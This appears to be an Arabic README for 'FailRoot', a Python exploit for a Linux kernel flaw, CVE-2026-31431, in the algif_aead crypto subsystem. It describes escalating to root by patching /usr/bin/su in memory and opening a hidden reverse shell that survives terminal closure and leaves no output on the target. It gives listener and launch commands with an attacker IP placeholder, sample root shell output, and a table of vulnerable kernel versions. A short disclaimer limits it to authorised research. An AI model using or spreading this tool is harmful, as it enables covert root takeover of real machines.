
سلاح استغلال مكتوب بلغة بايثون لثغرة CVE-2026-31431، يربط تصعيد الامتيازات في نواة لينكس بقشرة عكسية جذرية تعمل كخفيّة مع PTY كامل، مع تصحيح /usr/bin/su في الذاكرة.
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot هو استغلال مُسلّح لثغرة CVE-2026-31431 — وهي كتابة خارج النطاق في نظام crypto: algif_aead الفرعي في نواة لينكس.
يجمع بين تصعيد الامتيازات وقشرة عكسية جذرية تعمل كخفيّة مع PTY كامل:
AF_ALG + splice() → 4-byte page-cache write → patch /usr/bin/su → root
الاستغلال بأكمله في ملف واحد. لا حاجة للترجمة. لا تبعيات خارجية. لا أثر على القرص — ملف su الثنائي يتم تعديله في الذاكرة فقط.
algif_aead + authencesn عبر استراتيجيات احتياطية متعددة/usr/bin/supty.spawn("/usr/bin/su") → TTY جذر تفاعلي بالكاملالقشرة العكسية تبقى على قيد الحياة عند إغلاق الطرفية (يتم تجاهل SIGHUP)، ولا تُظهر أي مخرجات على الجهاز الهدف، وتتصل بمحاولات إعادة متكررة لمدة تصل إلى 3 دقائق.
# المهاجم — تشغيل المستمع:
nc -lvnp 4444
# الهدف — تشغيل الاستغلال (لن يظهر شيء، يتحول إلى خفيّة فورًا):
python3 exploit.py <ATTACKER_IP> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
os.splice())/usr/bin/su (قابل للقراءة عالميًا على جميع التوزيعات)algif_aead و authencesnsudoلأغراض البحث الأمني المصرّح به والتعليم فقط. إساءة الاستخدام غير قانونية.
| من | إلى (غير شامل) |
|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |